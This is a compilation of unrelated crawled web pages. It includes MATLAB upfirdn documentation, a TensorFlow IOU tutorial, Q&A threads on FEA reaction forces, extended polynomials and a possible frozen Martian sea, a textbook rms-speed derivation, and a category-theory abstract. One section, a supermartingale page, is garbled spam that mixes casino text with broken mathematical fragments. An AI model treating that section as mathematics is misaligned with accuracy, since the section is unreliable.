{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8466914296150208, "perplexity": 717.2199416347411}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-34/segments/1596439737233.51/warc/CC-MAIN-20200807231820-20200808021820-00207.warc.gz"}
https://de.mathworks.com/help/signal/ref/upfirdn.html
# upfirdn Upsample, apply FIR filter, and downsample ## Description yout = upfirdn(xin,h) filters the input signal xin using an FIR filter with impulse response h. No upsampling or downsampling is implemented with this syntax. yout = upfirdn(xin,h,p) specifies the integer upsampling factor p. example yout = upfirdn(xin,h,p,q) specifies the integer downsampling factor q. ## Examples collapse all Change the sample rate of a signal by a rational conversion factor from the DAT rate of 48 kHz to the CD sample rate of 44.1 kHz. Use the rat function to find the numerator L and the denominator M of the rational factor. Fdat = 48e3; Fcd = 44.1e3; [L,M] = rat(Fcd/Fdat) L = 147 M = 160 Generate a 1.5 kHz sinusoid sampled at ${\mathit{f}}_{\mathrm{DAT}}$ for 0.25 seconds. Plot the first millisecond of the signal. t = 0:1/Fdat:0.25-1/Fdat; x = sin(2*pi*1.5e3*t); stem(t,x) xlim([0 0.001]) hold on Design an antialiasing lowpass filter using a Kaiser window. Set the filter band edges as 90% and 110% of the cutoff frequency, $\left({\mathit{f}}_{\mathrm{DAT}}/2\right)×\mathrm{min}\left(1/\mathit{L},1/\mathit{M}\right)$. Specify a passband ripple of 5 dB and a stopband attenuation of 40 dB. Set the passband gain to L. f = (Fdat/2)*min(1/L,1/M); d = designfilt('lowpassfir', ... 'PassbandFrequency',0.9*f,'StopbandFrequency',1.1*f, ... 'PassbandRipple',5,'StopbandAttenuation',40, ... 'DesignMethod','kaiserwin','SampleRate',48e3); h = L*tf(d); Use upfirdn with the filter h to resample the sinusoid. Compute and compensate for the delay introduced by the filter. Generate the corresponding resampled time vector. y = upfirdn(x,h,L,M); delay = floor(((filtord(d)-1)/2-(L-1))/L); y = y(delay+1:end); t_res = (0:(length(y)-1))/Fcd; Overlay the resampled signal on the plot. stem(t_res,y,'*') legend('Original','Resampled','Location','southeast') hold off ## Input Arguments collapse all Input signal, specified as a vector or matrix. If xin is a vector, then it represents a single signal. If xin is a matrix,then each column is filtered independently. See Tips for more details. Filter impulse response, specified as a vector or matrix. If his a vector, then it represents one FIR filter. If h is a matrix, then each column is a separate FIR impulse response sequence. See Tips for more details. Upsampling factor, specified as a positive integer. Downsampling factor, specified as a positive integer. ## Output Arguments collapse all Output signal, returned as a vector or matrix. Each column of yout has length ceil(((length(xin)-1)*p+length(h))/q). Note Since upfirdn performs convolution and rate changing, the yout signals have a different length than xin. The number of rows of yout is approximately p/q times the number of rows of xin. ## Tips The valid combinations of the sizes of xin and h are: 1. xin is a vector and h is a vector. The inputs are one filter and one signal, so the function convolves xin with h. The output signal yout is a row vector if xin is a row vector; otherwise, yout is a column vector. 2. xin is a matrix and h is a vector. The inputs are one filter and many signals, so the function convolves h with each column of xin. The resulting yout is a matrix with the same number of columns as xin. 3. xin is a vector and h is a matrix. The inputs are multiple filters and one signal, so the function convolves each column of h with xin. The resulting yout is a matrix with the same number of columns as h. 4. xin is a matrix and h is a matrix, both with the same number of columns. The inputs are multiple filters and multiple signals, so the function convolves corresponding columns of xin and h. The resulting yout is a matrix with the same number of columns as xin and h. ## Algorithms upfirdn uses a polyphase interpolation structure. The number of multiply-add operations in the polyphase structure is approximately (LhLxpLx)/q where Lh and Lx are the lengths of h(n) and x(n), respectively. For long signals, this formula is often exact. upfirdn performs a cascade of three operations: 1. Upsample the input data in the matrix xin by a factor of the integer p (inserting zeros) 2. FIR filter the upsampled signal data with the impulse response sequence given in the vector or matrix h 3. Downsample the result by a factor of the integer q (throwing away samples) The FIR filter is usually a lowpass filter, which you must design using another function such as firpm or fir1. Note The function resample performs an FIR design using firls, followed by rate changing implemented with upfirdn. ## References [1] Crochiere, R. E. "A General Program to Perform Sampling Rate Conversion of Data by Rational Ratios." Programs for Digital Signal Processing (Digital Signal Processing Committee of the IEEE Acoustics, Speech, and Signal Processing Society, eds.). New York: IEEE Press, 1979, Programs 8.2-1–8.2-7. [2] Crochiere, R. E., and Lawrence R. Rabiner. Multirate Digital Signal Processing. Englewood Cliffs, NJ: Prentice-Hall, 1983.
2021-05-18 08:36:23
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 2, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8217846155166626, "perplexity": 2942.1750385802343}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-21/segments/1620243989756.81/warc/CC-MAIN-20210518063944-20210518093944-00559.warc.gz"}
https://chadrick-kwag.net/vectorized-calculatation-of-iou-and-removing-duplicate-boxes/
when doing object detection, it would be very hard to avoid calculating IOU at some point. Although this could be done iteratively one by one in python with a for loop if there are only a few boxes, when the number of boxes become large the computation time increases significantly. One way to speed things up is to caluclate the IOU matrix in a vectorized manner: in other words, calculating in units of arrays. Here is how calculate the IOU matrix using tensorflow. Also, the code will output the index pairs where the boxes have IOU value above a given threshold(in this case, 0.8). When getting this index pair, if we simply use tf.where with a condition the index pair would also include a pair of same indices, which is obvious because every box would have IOU values of 1.0 with itself. But we don’t want to count these cases. Therefore a bit more lines of code removes these cases. BTW, the code below assumes that the coordinates of the boxes are values relative to the image width and height, thus we assume that it is in the range of 0~1.The code using tensorflow is as below: def get_iou_matrix_tf(box_arr1, box_arr2): x11, y11, x12, y12 = tf.split(box_arr1, 4, axis=1) x21, y21, x22, y22 = tf.split(box_arr2, 4, axis=1) xA = tf.maximum(x11, tf.transpose(x21)) yA = tf.maximum(y11, tf.transpose(y21)) xB = tf.minimum(x12, tf.transpose(x22)) yB = tf.minimum(y12, tf.transpose(y22)) interArea = tf.maximum((xB - xA + 1e-9), 0) * tf.maximum((yB - yA + 1e-9), 0) boxAArea = (x12 - x11 + 1e-9) * (y12 - y11 + 1e-9) boxBArea = (x22 - x21 + 1e-9) * (y22 - y21 + 1e-9) iou = interArea / (boxAArea + tf.transpose(boxBArea) - interArea) return iou def calculate_iou_matrix_tf(boxarr, threshold=0.8): # or can use gpu. e.g. "/device:GPU:0" device_str = "/device:CPU:0" with tf.device(device_str): box_list_ph = tf.placeholder(tf.float32, shape=(None, 4)) iou_matrix = get_iou_matrix_tf(box_list_ph, box_list_ph) high_iou_coords = tf.where(iou_matrix>threshold) print(high_iou_coords) with tf.device("/device:CPU:0"): first_coords, second_coords = tf.split(high_iou_coords, 2, axis=1) iscoord_same = first_coords - second_coords tresult = tf.where(tf.not_equal(iscoord_same, 0)) sel_indices, _ = tf.split(tresult,2, axis=1) sel_indices = tf.squeeze(sel_indices) valid_high_iou_coords = tf.gather(high_iou_coords, sel_indices) with tf.Session() as sess: _iou_matrix, _valid_high_iou_coords = sess.run([iou_matrix, valid_high_iou_coords], feed_dict={box_list_ph: boxarr}) One thing to note about the code above, is that there are two separate parts which uses with tf.device statements. The first part’s device argument can be replace with a GPU. However, the second part cannot. You can try and you will run into an error that GPU cannot work with int types. That is why the second part needs to be run in the CPU region. The same can be done using numpy and this can be useful when user does not with to use tensorflow for getting the iou matrix. def calculate_iou_matrix(box_arr1, box_arr2): x11, y11, x12, y12 = np.split(box_arr1, 4, axis=1) x21, y21, x22, y22 = np.split(box_arr2, 4, axis=1) xA = np.maximum(x11, np.transpose(x21)) yA = np.maximum(y11, np.transpose(y21)) xB = np.minimum(x12, np.transpose(x22)) yB = np.minimum(y12, np.transpose(y22)) interArea = np.maximum((xB - xA + 1e-9), 0) * np.maximum((yB - yA + 1e-9), 0) boxAArea = (x12 - x11 + 1e-9) * (y12 - y11 + 1e-9) boxBArea = (x22 - x21 + 1e-9) * (y22 - y21 + 1e-9) iou = interArea / (boxAArea + np.transpose(boxBArea) - interArea) return iou Categories: tensorflow
2023-02-03 17:46:17
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6884349584579468, "perplexity": 6270.542686779195}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500058.1/warc/CC-MAIN-20230203154140-20230203184140-00435.warc.gz"}
https://scicomp.stackexchange.com/questions/29344/how-does-one-calculate-reaction-force-in-fea
# How does one calculate reaction force in FEA? I wrote a UEL (User Element in Abaqus) for one element and compared to a reference UEL which used standard FEM, where the results agreed satisfactorily, except the reaction force. The stress, strain, strain energy all were pretty accurate. I am unable to understand this, how the reaction force is calculated? I am simply restraining the element in the bottom (two nodes) and applying displacement (incrementally) at the top (two nodes). As far as I know, the stiffness matrix is used to calculate reaction forces in these cases, the stiffness values are quite similar in my UEL and the FEM UEL. Also if this was the case, the other parameters wouldn't have had the same values. Would be grateful if anybody could help me figure this out. • Welcome to Scicomp! This question is better-suited for an abaqus-specific forum or for the abaqus support team. They will know the specific internals of the abaqus solver, and for this reason, application-specific questions are generally regarded as off-topic here. If, however, your question is about the mathematics behind FEM, then rephrasing the question in this way is more likely to be on-topic here. – Tyler Olsen Apr 21 '18 at 2:32 • Thanks for the comment! I will try to rephrase the question since it is mostly about the mathematics/mechanics behind the FEA procedure. – Schneider Apr 21 '18 at 15:43 To calculate the reaction forces at a node, Abaqus (or any structural FE code) simply sums the internal forces for all elements attached to that node. The reaction forces are the negative of that sum. For an Abaqus user element, the internal forces for the element are returned from subroutine UEL in the RHS array. The returned stiffness matrix (Jacobian), AMATRX, is not used in the reaction force calculations. Of course, for a simple linear element, the internal force vector will equal the negative of the product of the element stiffness matrix and the nodal displacement vector. • note that with one element and all displacement bc's you could return a completely wrong rhs and it will not cause any issue except giving the bad value as a reaction force. – george Apr 21 '18 at 13:13 • @george: How would that be possible? That all other possible parameters are correctly output but only the Reaction force is wrong? I mean the RHS is used in each iteration for calculations right? Then are how are the other values correct? – Schneider Apr 21 '18 at 15:40 • @Bill Greene: This problem involves a non-linear element, there are basically two elements defined in the UEL and I calculate the RHS as the product of Transpose of B matrix with the Stress vector. – Schneider Apr 21 '18 at 15:51 • with displacement boundary conditions on every node in the model the solver doesn't do anything with the rhs vector. You really should be using some force conditions to test your uel. (I would recomend testing in a model mixed with some standard elements as well) – george Apr 21 '18 at 17:33 • Thanks for your comments! I did run a test with more than one element, there the UEL failed to show convergence! It didn't even converge for the first increment! The strange thing is RHS values provided by my UEL and the FEM one is almost similar. – Schneider Apr 21 '18 at 17:39 Once the solution of the problem is known, i.e. you know displacement vector, to calculate reaction/internal forces an integral is evaluated $$\mathbf{f}^\textrm{int} = \sum_{e=1}^{n_e} \int_\Omega \mathbf{B}^\textrm{T}({\boldsymbol\sigma}(\boldsymbol\varepsilon)) \textrm{d}\Omega = \sum_{i=1}^{n_e} \sum_{i=1}^{n_g} j_i w_i \left( \mathbf{B}_i^\textrm{T}{\boldsymbol\sigma}(\boldsymbol\varepsilon_i) \right)$$ where $j_i$ and $w_i$ is jacobian and integration weight respectively, $\mathbf{B}$ is differential operator evaluated at integration point $i$, such that $$\boldsymbol\varepsilon_i = \mathbf{B}_i\mathbf{u}^e$$ where $\mathbf{u}^e$ is vector of nodal degrees of freedom on element $e$. Elements of the vector $\mathbf{f}^\textrm{int}$ which are at constrained degrees of freedom are reaction forces. Equations above are general, apply to the linear and nonlinear problem. To make it work you need to provide a physical equation for example in UMAT, i.e. $${\boldsymbol\sigma} = {\boldsymbol\sigma}( \boldsymbol\varepsilon )$$ • Just wanted to verify something I discussed in the previous answer as well. Suppose I am using displacement boundary conditions only. In my model, One Element, two nodes are fixed and other two nodes have a fixed displacement(applied incrementally), so the only output variable to be compared(with another reference code with same boundary conditions) is the internal force(or reaction force),since all the displacements are known, every other parameter such as Strain-Stress-Strain Energy would anyways be the same? – Schneider Apr 23 '18 at 0:32 • Yes. You can check if $K u - f^\textrm{int} = 0$, and energy which should be $E=\frac{1}{2} u f^\textrm{int}$. – likask Apr 23 '18 at 7:23
2020-02-21 02:54:37
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 3, "x-ck12": 0, "texerror": 0, "math_score": 0.7613461017608643, "perplexity": 745.661638789477}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-10/segments/1581875145438.12/warc/CC-MAIN-20200221014826-20200221044826-00007.warc.gz"}
https://cs.stackexchange.com/questions/66280/what-is-extended-polynomials/66292
What is "extended polynomials" I've heard that the functions that are definable in simply-typed $\lambda$-calculus is the class of extended polynomials. However, it is still not clear to me what exactly is extended polynomials. Could someone explain that to me? Some pointers would be good as well. Thanks. It turns out the definition is straightforward as seen in [1]. And as an example, exponentiation is not definable in simply-type $\lambda$-calculus.
2023-03-22 15:15:07
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8721926212310791, "perplexity": 369.59228628922074}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943845.78/warc/CC-MAIN-20230322145537-20230322175537-00359.warc.gz"}
https://space.stackexchange.com/questions/27843/is-there-really-a-frozen-lake-near-the-equator-on-mars
# Is there really a frozen lake near the equator on Mars? Figure 1. Views of plate-like terrain on Mars, and pack-ice on Earth. From the paper linked below. a, Part of an HRSC image of Mars from orbit 32, with a resolution of 13.7 m per pixel, centred at 5.5° north latitude and 150.4° east longitude, showing plate-like deposits with signs of break-up, rotation and lateral movement to the west-southwest in the lower part of the image. Scale bar is 25 km. b, Synthetic Aperture Radar image of pack-ice in the Weddell Sea, Antarctica. Scale bar is 25 km. (ESA image, processed by H. Rott.) c, Enlarged view of raft 7 × 12 km showing 8° rotation anticlockwise, causing the clear lane downstream of island ‘I’ to be curved. Leads ‘L’ downstream of the crater and small island at lower right are almost straight, indicating unidirectional drift slightly north of westward. Note pressure ridges ‘P’ upstream of islands. Arrows show relative motion vectors of individual plates. Scale bar is 10 km. In Murray et al. (2005) in the journal Nature with the significant title "Evidence from the Mars Express High Resolution Stereo Camera for a frozen sea close to Mars'equator" images from the above-named camera are presented from which is inferred the existence of a frozen body of water, with surface pack-ice, around 5$^0$ north latitude and 150$^0$ east longitude in the Cerberus Palus region. The frozen lake should measure about 800 x 900 km in lateral extent ! Have there been observations by any radar instrument or neutron detector that can confirm or invalidate the existence of the putative frozen lake in the Cerberus Palus region ? And is there further evidence from high resolution cameras for the existence of ice deposits within this region since the publication of the article in 2005 ? Evidence of ice surface lowering and draping of plain-like features over partly submerged craters. • What does the article say about that? It's paywalled so we can't read it. Currently it looks like you're just assuming there have been no SHARAD observations. – Hobbes Jun 13 '18 at 11:50 • You don't explore with radar, the SHARAD instrument's already done it's job. Perhaps the question should be what the next step is, how it would be validated. – GdD Jun 13 '18 at 11:54 • @Hobbes You can read it if you crash the paywall ! I've changed the last question somewhat. – Conelisinspace Jun 13 '18 at 12:20 • What are results of neutron scatterimg from Cerberus Palus? Neutrons are indicator of hydrogen amount in soil, and hydrogen means water. – Heopps Jun 13 '18 at 13:26 • @Conelisinspace yes, but I meant if the ice is deeper, neutrons don't show it. Radar have deeper penetration. – Heopps Jun 13 '18 at 15:44
2019-10-19 22:34:35
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.31262218952178955, "perplexity": 3673.5402181333006}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570986700435.69/warc/CC-MAIN-20191019214624-20191020002124-00559.warc.gz"}
http://n-gage-center.de/quasar-gaming/supermartingale.php
# Supermartingale Definition Let (il, F, P) be a probability triple and {Tt} be a filtration on F. A stochastic process X is an {Ft} supermartingale if: (i) X is adapted to \Tt } ; (ii) E[\Xt \]. Submartingale und Supermartingale ; Beispiele. Definition: \$ \;\$ Sei \$ \{X_t,\,t\ge 0 \}\$ ein stochastischer Prozess über dem. it is called a super-martingale. An important result is Jensen's inequality. Theorem. If Xn is a martingale and if φ(x) is a convex function of x then φ(Xn) = Yn is. ### Video Martingales AnastasisKratsios on The Projection Theorems. Definition 1 A martingale,is an integrable process satisfying. Casino verweigert auszahlung Sei ein Wiener-Prozess. Whereas constructing examples of local martingales which are not martingales is a relatively straightforward exercise, such examples are often slightly contrived and the martingale property fails for obvious reasons e. Martingale und Martingaltheorie Satz Stochastik. This would indeed follow if it was known that it is a martingale, as is often assumed to be true for stochastic integrals with respect to Brownian motion. In fact, the following inequality holds 4 almost surely for times. ### Supermartingale - letztes PR , Stochastic Calculus , Stochastic Differential Equations , Supermartingale. This therefore describes a fair game where, eventually, the gambler is guaranteed to win. Dann ergibt sich analog zur obigen Rechnung. This is therefore a martingale, showing that is a local martingale. That is, the conditional expected value of the next observation, given all the past observations, is equal to the most recent observation.
2018-03-24 10:09:05
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9011728763580322, "perplexity": 2349.9360146325134}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-13/segments/1521257650188.31/warc/CC-MAIN-20180324093251-20180324113251-00127.warc.gz"}
https://socratic.org/questions/if-a-current-of-3-a-passing-through-a-circuit-generates-3-w-of-power-what-is-the
# If a current of 3 A passing through a circuit generates 3 W of power, what is the resistance of the circuit? $\frac{1}{3} \Omega$ Relationship between Power $P$ generated , resistance $R$ of a circuit and current $I$ flowing is given as, $P = {I}^{2} R$ So,$R = \frac{3}{3} ^ 2 = \frac{1}{3} \Omega$
2022-01-28 00:18:57
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 6, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4596675634384155, "perplexity": 659.5518797014726}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320305317.17/warc/CC-MAIN-20220127223432-20220128013432-00571.warc.gz"}
https://www.studysmarter.us/textbooks/physics/modern-physics-2nd-edition/statistical-mechanics/41e-show-that-the-rms-speed-of-a-gas-molecule-defined-as-is-/
Suggested languages for you: Americas Europe 41E Expert-verified Found in: Page 405 ### Modern Physics Book edition 2nd Edition Author(s) Randy Harris Pages 633 pages ISBN 9780805303087 # Show that the rms speed of a gas molecule, defined as ${{\mathbf{v}}}_{{\mathbf{rms}}}{\mathbf{\equiv }}\sqrt{{\mathbf{v}}^{\mathbf{2}}}$, is given by $\sqrt{\frac{\mathbf{3}{\mathbf{k}}_{\mathbf{B}}\mathbf{T}}{\mathbf{m}}}$. The rms speed of a gas molecule is $\sqrt{\frac{3{\mathrm{k}}_{\mathrm{B}}\mathrm{T}}{\mathrm{m}}}$ See the step by step solution ## Step 1: Maxwell Probability Distribution ${{\mathbf{v}}}_{{\mathbf{rms}}}{\mathbf{=}}\sqrt{\overline{{\mathbf{v}}_{\mathbf{2}}}}$ ${{\mathbf{v}}}_{{\mathbf{rms}}}{\mathbf{=}}{\left({\int }_{0}^{\infty }{v}^{2}P\left(v\right)\mathrm{dv}\right)}^{\frac{\mathbf{1}}{\mathbf{2}}}$ ……(1) Where, P(v) is the Maxwell probability distribution, which is given by ${\mathbf{P}}\left(v\right){\mathbf{=}}{\left(\frac{m}{2{\mathrm{\pi k}}_{B}T}\right)}^{\frac{\mathbf{3}}{\mathbf{2}}}{\mathbf{4}}{{\mathbf{\pi v}}}^{{\mathbf{2}}}{{\mathbf{e}}}^{\frac{\mathbf{-}{\mathbf{mv}}^{\mathbf{2}}}{\mathbf{2}{\mathbf{k}}_{\mathbf{B}}\mathbf{T}}}$…..(2) Where, m is the mass of the particle. v is velocity of particle. kB is Boltzmann constant. ## Step 2: determine the speed of gas ${\mathrm{v}}_{\mathrm{rms}}={\left({\int }_{0}^{\infty }{\mathrm{v}}^{2}{\left(\frac{\mathrm{m}}{2{\mathrm{\pi k}}_{\mathrm{B}}\mathrm{T}}\right)}^{\frac{3}{2}}4{\mathrm{\pi v}}^{2}{\mathrm{e}}^{-\frac{{\mathrm{m}}^{2}}{2{\mathrm{k}}_{\mathrm{B}}\mathrm{T}}}\mathrm{dv}\right)}^{\frac{1}{2}}$ Let $\mathrm{b}=\frac{1}{2{\mathrm{a}}^{2}}=\frac{\mathrm{m}}{2{\mathrm{k}}_{\mathrm{B}}\mathrm{T}}$ $\begin{array}{rcl}{\mathrm{v}}_{\mathrm{rms}}& =& {\left(4\mathrm{\pi }{\left(\frac{\mathrm{b}}{\mathrm{\pi }}\right)}^{\frac{3}{2}}{\int }_{0}^{\infty }{\mathrm{v}}^{4}{\mathrm{e}}^{-{\mathrm{bv}}^{2}}\mathrm{dv}\right)}^{\frac{1}{2}}\\ & =& {\left(4\mathrm{\pi }{\left(\frac{\mathrm{b}}{\mathrm{\pi }}\right)}^{\frac{3}{2}}\frac{3}{8}\sqrt{\frac{\mathrm{\pi }}{{\mathrm{b}}^{5}}}\right)}^{\frac{1}{2}}\\ & =& {\left(\frac{3}{2\mathrm{b}}\right)}^{\frac{1}{2}}\\ & =& \sqrt{\frac{3{\mathrm{k}}_{\mathrm{B}}\mathrm{T}}{\mathrm{m}}}\end{array}$ Therefore, The rms speed of a gas molecule is $\sqrt{\frac{3{\mathrm{k}}_{\mathrm{B}}\mathrm{T}}{\mathrm{m}}}$.
2023-03-24 23:11:20
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 25, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.965787410736084, "perplexity": 2708.4645810158872}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945289.9/warc/CC-MAIN-20230324211121-20230325001121-00405.warc.gz"}
http://eptcs.web.cse.unsw.edu.au/paper.cgi?ACT2020.16
## Proof Theory of Partially Normal Skew Monoidal Categories Tarmo Uustalu Niccolò Veltri Noam Zeilberger The skew monoidal categories of Szlachányi are a weakening of monoidal categories where the three structural laws of left and right unitality and associativity are not required to be isomorphisms but merely transformations in a particular direction. In previous work, we showed that the free skew monoidal category on a set of generating objects can be concretely presented as a sequent calculus. This calculus enjoys cut elimination and admits focusing, i.e. a subsystem of canonical derivations, which solves the coherence problem for skew monoidal categories. In this paper, we develop sequent calculi for partially normal skew monoidal categories, which are skew monoidal categories with one or more structural laws invertible. Each normality condition leads to additional inference rules and equations on them. We prove cut elimination and we show that the calculi admit focusing. The result is a family of sequent calculi between those of skew monoidal categories and (fully normal) monoidal categories. On the level of derivability, these define 8 weakenings of the (unit,tensor) fragment of intuitionistic non-commutative linear logic. In David I. Spivak and Jamie Vicary: Proceedings of the 3rd Annual International Applied Category Theory Conference 2020 (ACT 2020), Cambridge, USA, 6-10th July 2020, Electronic Proceedings in Theoretical Computer Science 333, pp. 230–246. Published: 8th February 2021. ArXived at: http://dx.doi.org/10.4204/EPTCS.333.16 bibtex PDF References in reconstructed bibtex, XML and HTML format (approximated). Comments and questions to: eptcs@eptcs.org For website issues: webmaster@eptcs.org
2022-08-13 12:58:13
